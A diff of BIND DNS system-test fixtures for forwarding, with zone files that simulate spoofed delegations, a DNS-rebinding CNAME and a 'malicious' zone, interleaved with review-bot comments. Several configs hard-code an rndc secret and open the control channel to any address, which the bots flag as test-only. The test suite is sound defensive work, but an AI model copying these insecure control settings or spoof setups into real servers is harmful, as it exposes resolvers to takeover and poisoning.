b/bin/tests/system/forward/ns10/named.conf.in 
@@ -0,0 +1,53 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.10;
+ notify-source 10.53.0.10;
+ transfer-source 10.53.0.10;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.10; };
+ listen-on-v6 { none; };
+ minimal-responses no;
+};
+
+zone "net." {
+ type master;
+ file "fakenet.zone";
+};
+
+zone "spoofed.net." {
+ type master;
+ file "spoofednet.zone";
+};
+
+zone "sub.local.net." {
+ type master;
+ file "fakesublocalnet.zone";
+};
+
+zone "net2" {
+ type master;
+ file "fakenet2.zone";
+};
+
+zone "net.example.lll" {
+ type master;
+ file "net.example.lll";
+};
+
+zone "sub.local.tld." {
+ type master;
+ file "fakesublocaltld.zone";
+};
diff --git a/bin/tests/system/forward/ns10/net.example.lll b/bin/tests/system/forward/ns10/net.example.lll
new file mode 100644
index 0000000..ba0804f
--- /dev/null
+++ b/bin/tests/system/forward/ns10/net.example.lll
@@ -0,0 +1,15 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 86400
+net.example.lll. SOA . . 0 0 0 0 0
+net.example.lll. NS attackSecureDomain.net.
+didItWork.net.example.lll. TXT "if you can see this record the attack worked"
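Review bot: The `options` block in ns10/named.conf.in sets neither `recursion` nor `dnssec-validation`, while the other authoritative-only fixtures in this commit (ns1, ns2) state `recursion no;` and `dnssec-validation no;` explicitly. Every zone in this file is loaded from a local file, so the server appears to need neither feature. If the defaults are relied on deliberately, a comment should say so; otherwise add `recursion no;` to match the sibling configs. A short header comment such as `/* ns10: serves the spoofed zones used by the forward test. */` would also help, because the server's role is only implied by the zone file names.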
diff --git a/bin/tests/system/forward/ns10/spoofednet.zone b/bin/tests/system/forward/ns10/spoofednet.zone new file mode 100644 index 0000000..fb70a43 --- /dev/null +++ b/bin/tests/system/forward/ns10/spoofednet.zone @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +spoofed.net. SOA . . 0 0 0 0 0 +spoofed.net. NS ns.spoofed.net. +ns.spoofed.net. A 10.53.0.10 +spoofed.net. TXT "this record is clearly spoofed" diff --git a/bin/tests/system/forward/ns2/example.db b/bin/tests/system/forward/ns2/example.db new file mode 100644 index 0000000..df3e52c --- /dev/null +++ b/bin/tests/system/forward/ns2/example.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.1 + +txt TXT "forwarded" diff --git a/bin/tests/system/forward/ns2/named.conf.in b/bin/tests/system/forward/ns2/named.conf.in new file mode 100644 index 0000000..f9a081a --- /dev/null +++ b/bin/tests/system/forward/ns2/named.conf.in 
@@ -0,0 +1,72 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + query-source-v6 address fd92:7065:b8e:ffff::2; + notify-source 10.53.0.2; + notify-source-v6 fd92:7065:b8e:ffff::2; + transfer-source 10.53.0.2; + transfer-source-v6 fd92:7065:b8e:ffff::2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; +}; + +zone "." { + type hint; + file "root.db"; +}; + +zone "example1." { + type primary; + file "example.db"; +}; + +zone "example2." { + type primary; + file "example.db"; +}; + +zone "example3." { + type primary; + file "example.db"; +}; + +zone "example4." { + type primary; + file "example.db"; +}; + +zone "example7." { + type primary; + file "example.db"; +}; + +zone "grafted." { + type primary; + file "example.db"; +}; + +zone "1.0.10.in-addr.arpa." { + type primary; + file "example.db"; +}; + +zone "tld" { + type primary; + file "tld.db"; +}; diff --git a/bin/tests/system/forward/ns2/root.db b/bin/tests/system/forward/ns2/root.db new file mode 100644 index 0000000..7108723 --- /dev/null +++ b/bin/tests/system/forward/ns2/root.db 
@@ -0,0 +1,30 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example1 NS ns.example1 +ns.example1 A 10.53.0.1 + +example2 NS ns.example2 +ns.example2 A 10.53.0.1 + +example3 NS ns.example3 +ns.example3 A 10.53.0.1 diff --git a/bin/tests/system/forward/ns2/tld.db b/bin/tests/system/forward/ns2/tld.db new file mode 100644 index 0000000..965f2a4 --- /dev/null +++ b/bin/tests/system/forward/ns2/tld.db @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns root ( + 2000082401 ; serial + 1800 ; refresh (30 minutes) + 1800 ; retry (30 minutes) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.2 +sld NS ns.sld +ns.sld A 10.53.0.1 +local NS ns.local +ns.local A 10.53.0.9 +sibling NS ns.sibling +ns.sibling A 10.53.0.4 +sibling NS ns.sub.local +ns.sub.local A 10.53.0.10 diff --git a/bin/tests/system/forward/ns3/named1.conf.in b/bin/tests/system/forward/ns3/named1.conf.in new file mode 100644 index 0000000..88f1eee --- /dev/null 
+++ b/bin/tests/system/forward/ns3/named1.conf.in
@@ -0,0 +1,66 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.3;
+ query-source-v6 address fd92:7065:b8e:ffff::3;
+ notify-source 10.53.0.3;
+ notify-source-v6 fd92:7065:b8e:ffff::3;
+ transfer-source 10.53.0.3;
+ transfer-source-v6 fd92:7065:b8e:ffff::3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { fd92:7065:b8e:ffff::3; };
+ forwarders { fd92:7065:b8e:ffff::2; };
+ forward first;
+ dnssec-validation yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "root.db";
+};
+
+zone "example1." {
+ type forward;
+ forward first;
+ forwarders { 10.53.0.2; };
+};
+
+zone "example2." {
+ type forward;
+ forward first;
+ forwarders { };
+};
+
+zone "example3." {
+ type forward;
+ forward only;
+ forwarders { };
+};
+
+zone "example7." {
+ type forward;
+ forward first;
+ forwarders { 10.53.0.6; };
+};
diff --git a/bin/tests/system/forward/ns3/named2.conf.in b/bin/tests/system/forward/ns3/named2.conf.in
new file mode 100644
index 0000000..b498e87
--- /dev/null
+++ b/bin/tests/system/forward/ns3/named2.conf.in
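Review bot: The `controls` block in ns3/named1.conf.in accepts rndc connections from `allow { any; }` and authenticates them with the literal secret `"1234abcd8765"`, and nothing in the file marks this as a test-only arrangement. The channel is bound to the 10.53.0.3 test address, which limits exposure, but fixture configs get copied, so I would add a comment above `key rndc_key` such as `/* Test-only control key; never reuse outside the system test addresses (10.53.0.x). */`. If the test harness always connects from a 10.53.0.x address, which this hunk does not show, the ACL could also be narrowed from `any`. The identical `key` and `controls` blocks in ns3/named2.conf.in need the same comment.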
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.3;
+ query-source-v6 address fd92:7065:b8e:ffff::3;
+ notify-source 10.53.0.3;
+ notify-source-v6 fd92:7065:b8e:ffff::3;
+ transfer-source 10.53.0.3;
+ transfer-source-v6 fd92:7065:b8e:ffff::3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { fd92:7065:b8e:ffff::3; };
+ forwarders { 10.53.0.6; };
+ dnssec-validation yes;
+};
+
+include "trusted.conf";
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "root.db";
+};
diff --git a/bin/tests/system/forward/ns3/root.db b/bin/tests/system/forward/ns3/root.db
new file mode 100644
index 0000000..7108723
--- /dev/null
+++ b/bin/tests/system/forward/ns3/root.db
@@ -0,0 +1,30 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example1 NS ns.example1 +ns.example1 A 10.53.0.1 + +example2 NS ns.example2 +ns.example2 A 10.53.0.1 + +example3 NS ns.example3 +ns.example3 A 10.53.0.1 diff --git a/bin/tests/system/forward/ns4/malicious.db b/bin/tests/system/forward/ns4/malicious.db new file mode 100644 index 0000000..e4859c1 --- /dev/null +++ b/bin/tests/system/forward/ns4/malicious.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA malicious. admin.malicious. ( + 1 ; Serial + 604800 ; Refresh + 86400 ; Retry + 2419200 ; Expire + 86400 ) ; Negative Cache TTL + +@ IN NS ns + +ns IN A 10.53.0.4 + +target IN CNAME subdomain.rebind. diff --git a/bin/tests/system/forward/ns4/named.conf.in b/bin/tests/system/forward/ns4/named.conf.in new file mode 100644 index 0000000..c97823d --- /dev/null +++ b/bin/tests/system/forward/ns4/named.conf.in 
@@ -0,0 +1,69 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + minimal-responses yes; +}; + +zone "." { + type hint; + file "root.db"; +}; + +zone "example1." { + type forward; + forward first; + forwarders { 10.53.0.2; }; +}; + +zone "example3." { + type forward; + forwarders { 10.53.0.2; }; +}; + +zone "example5." { + type forward; + forward only; + forwarders { 10.53.0.2; }; +}; + +zone "1.0.10.in-addr.arpa" { + type forward; + forward only; + forwarders { 10.53.0.2; }; +}; + +zone "grafted" { + type forward; + forward only; + forwarders { 10.53.0.2; }; +}; + +zone "malicious." { + type primary; + file "malicious.db"; +}; + +zone "sibling.tld" { + type primary; + file "sibling.tld.db"; +}; diff --git a/bin/tests/system/forward/ns4/root.db b/bin/tests/system/forward/ns4/root.db new file mode 100644 index 0000000..7108723 --- /dev/null +++ b/bin/tests/system/forward/ns4/root.db 
@@ -0,0 +1,30 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example1 NS ns.example1 +ns.example1 A 10.53.0.1 + +example2 NS ns.example2 +ns.example2 A 10.53.0.1 + +example3 NS ns.example3 +ns.example3 A 10.53.0.1 diff --git a/bin/tests/system/forward/ns4/sibling.tld.db b/bin/tests/system/forward/ns4/sibling.tld.db new file mode 100644 index 0000000..fe080ae --- /dev/null +++ b/bin/tests/system/forward/ns4/sibling.tld.db @@ -0,0 +1,22 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA malicious. admin.malicious. ( + 1 ; Serial + 604800 ; Refresh + 86400 ; Retry + 2419200 ; Expire + 86400 ) ; Negative Cache TTL + +@ IN NS ns + +ns IN A 10.53.0.4 diff --git a/bin/tests/system/forward/ns5/named.conf.in b/bin/tests/system/forward/ns5/named.conf.in new file mode 100644 index 0000000..024f49b --- /dev/null +++ b/bin/tests/system/forward/ns5/named.conf.in 
@@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + forward only; + forwarders { 10.53.0.4; }; + deny-answer-aliases { "rebind"; }; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "root.db"; +}; + +zone "rebind" { + type primary; + file "rebind.db"; +}; diff --git a/bin/tests/system/forward/ns5/rebind.db b/bin/tests/system/forward/ns5/rebind.db new file mode 100644 index 0000000..aed6c2e --- /dev/null +++ b/bin/tests/system/forward/ns5/rebind.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA rebind. admin.rebind. ( + 1 ; Serial + 604800 ; Refresh + 86400 ; Retry + 2419200 ; Expire + 86400 ) ; Negative Cache TTL + +@ IN NS ns + +ns IN A 10.53.0.5 + +subdomain IN A 10.53.0.1 diff --git a/bin/tests/system/forward/ns5/root.db b/bin/tests/system/forward/ns5/root.db new file mode 100644 index 0000000..7108723 --- /dev/null +++ b/bin/tests/system/forward/ns5/root.db 
@@ -0,0 +1,30 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example1 NS ns.example1 +ns.example1 A 10.53.0.1 + +example2 NS ns.example2 +ns.example2 A 10.53.0.1 + +example3 NS ns.example3 +ns.example3 A 10.53.0.1 diff --git a/bin/tests/system/forward/ns7/named.conf.in b/bin/tests/system/forward/ns7/named.conf.in new file mode 100644 index 0000000..302bb55 --- /dev/null +++ b/bin/tests/system/forward/ns7/named.conf.in @@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.7; + notify-source 10.53.0.7; + transfer-source 10.53.0.7; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.7; }; + listen-on-v6 { none; }; + forwarders { 10.53.0.4; }; + forward first; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "root.db"; +}; diff --git a/bin/tests/system/forward/ns7/root.db b/bin/tests/system/forward/ns7/root.db new file mode 100644 index 0000000..7108723 --- /dev/null +++ b/bin/tests/system/forward/ns7/root.db 
@@ -0,0 +1,30 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+example1 NS ns.example1
+ns.example1 A 10.53.0.1
+
+example2 NS ns.example2
+ns.example2 A 10.53.0.1
+
+example3 NS ns.example3
+ns.example3 A 10.53.0.1
diff --git a/bin/tests/system/forward/ns8/named.conf.in b/bin/tests/system/forward/ns8/named.conf.in
new file mode 100644
index 0000000..2de656f
--- /dev/null
+++ b/bin/tests/system/forward/ns8/named.conf.in
@@ -0,0 +1,35 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.8;
+ notify-source 10.53.0.8;
+ transfer-source 10.53.0.8;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.8; };
+ listen-on-v6 { none; };
+ forwarders { 10.53.0.2; }; // returns referrals
+ forward first;
+ dnssec-validation yes;
+};
+
+zone "." {
+ type hint;
+ file "root.db";
+};
+
+zone "sub.local.tld" {
+ type primary;
+ file "sub.local.tld.db";
+};
diff --git a/bin/tests/system/forward/ns8/root.db b/bin/tests/system/forward/ns8/root.db
new file mode 100644
index 0000000..2cbdff5
--- /dev/null
+++ b/bin/tests/system/forward/ns8/root.db
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
diff --git a/bin/tests/system/forward/ns8/sub.local.tld.db b/bin/tests/system/forward/ns8/sub.local.tld.db
new file mode 100644
index 0000000..f2234c7
--- /dev/null
+++ b/bin/tests/system/forward/ns8/sub.local.tld.db
@@ -0,0 +1,15 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+sub.local.tld. 3600 IN SOA . . 0 0 0 0 0
+sub.local.tld. 3600 IN NS ns.sub.local.tld.
+sub.local.tld. 3600 IN TXT good
+ns.sub.local.tld. 3600 IN A 10.53.0.8
diff --git a/bin/tests/system/forward/ns9/local.net.db b/bin/tests/system/forward/ns9/local.net.db
new file mode 100644
index 0000000..af0d2a5
--- /dev/null
+++ b/bin/tests/system/forward/ns9/local.net.db
@@ -0,0 +1,16 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+local.net. 3600 IN SOA . . 0 0 0 0 0
+local.net. 3600 IN NS localhost.
+ns.local.net. 3600 IN A 10.53.0.9
+txt.local.net. 3600 IN TXT "something in the local auth zone"
+sub.local.net. 3600 IN NS ns.spoofed.net. ; attacker will try to override this
diff --git a/bin/tests/system/forward/ns9/local.tld.db b/bin/tests/system/forward/ns9/local.tld.db
new file mode 100644
index 0000000..876a913
--- /dev/null
+++ b/bin/tests/system/forward/ns9/local.tld.db
@@ -0,0 +1,15 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+local.tld. 3600 IN SOA . . 0 0 0 0 0
+local.tld. 3600 IN NS localhost.
+sub.local.tld. 3600 IN NS ns.sub.local.tld.
+ns.sub.local.tld. 3600 IN A 10.53.0.8
diff --git a/bin/tests/system/forward/ns9/named1.conf.in b/bin/tests/system/forward/ns9/named1.conf.in
new file mode 100644
index 0000000..be9a438
--- /dev/null
+++ b/bin/tests/system/forward/ns9/named1.conf.in
@@ -0,0 +1,67 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.9;
+ notify-source 10.53.0.9;
+ transfer-source 10.53.0.9;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.9; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+ edns-udp-size 1232;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.9 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+server 10.53.0.10 {
+ edns no;
+};
+
+server 10.53.0.11 {
+ edns no;
+};
+
+zone "." {
+ type hint;
+ file "root.db";
+};
+
+zone "attacksecuredomain.net." {
+ type forward;
+ forwarders { 10.53.0.10; };
+};
+
+zone "attacksecuredomain.net2." {
+ type forward;
+ forwarders { 10.53.0.10; };
+};
+
+zone "attacksecuredomain.net3." {
+ type forward;
+ forwarders { 10.53.0.11; };
+};
+
+zone "local.net." {
+ type primary;
+ file "local.net.db";
+ forwarders {};
+};
diff --git a/bin/tests/system/forward/ns9/named2.conf.in b/bin/tests/system/forward/ns9/named2.conf.in
new file mode 100644
index 0000000..2c40b42
--- /dev/null
+++ b/bin/tests/system/forward/ns9/named2.conf.in
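Review bot: In ns9/named1.conf.in the `controls` statement pairs `allow { any; }` with an `rndc_key` whose secret is written in the file, and nothing in the file marks that as a harness-only arrangement. Every address here is in 10.53.0.x, which looks like the suite's private test network, so the setting is presumably deliberate; a comment above the `key` block would record that, e.g. `/* test-only rndc key for the 10.53.0.x harness; never reuse in a deployed named.conf */`. The same `key`/`controls` pair is repeated without comment in named2.conf.in, named3.conf.in and named4.conf.in.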
@@ -0,0 +1,70 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.9;
+ notify-source 10.53.0.9;
+ transfer-source 10.53.0.9;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.9; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+ edns-udp-size 1232;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.9 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+server 10.53.0.10 {
+ edns no;
+};
+
+server 10.53.0.11 {
+ edns no;
+};
+
+zone "." {
+ type hint;
+ file "root.db";
+};
+
+zone "attacksecuredomain.net." {
+ type forward;
+ forward only;
+ forwarders { 10.53.0.10; };
+};
+
+zone "attacksecuredomain.net2." {
+ type forward;
+ forward only;
+ forwarders { 10.53.0.10; };
+};
+
+zone "attacksecuredomain.net3." {
+ type forward;
+ forward only;
+ forwarders { 10.53.0.11; };
+};
+
+zone "local.net." {
+ type primary;
+ file "local.net.db";
+ forwarders {};
+};
diff --git a/bin/tests/system/forward/ns9/named3.conf.in b/bin/tests/system/forward/ns9/named3.conf.in
new file mode 100644
index 0000000..576f57c
--- /dev/null
+++ b/bin/tests/system/forward/ns9/named3.conf.in
@@ -0,0 +1,50 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.9;
+ notify-source 10.53.0.9;
+ transfer-source 10.53.0.9;
+ port @PORT@;
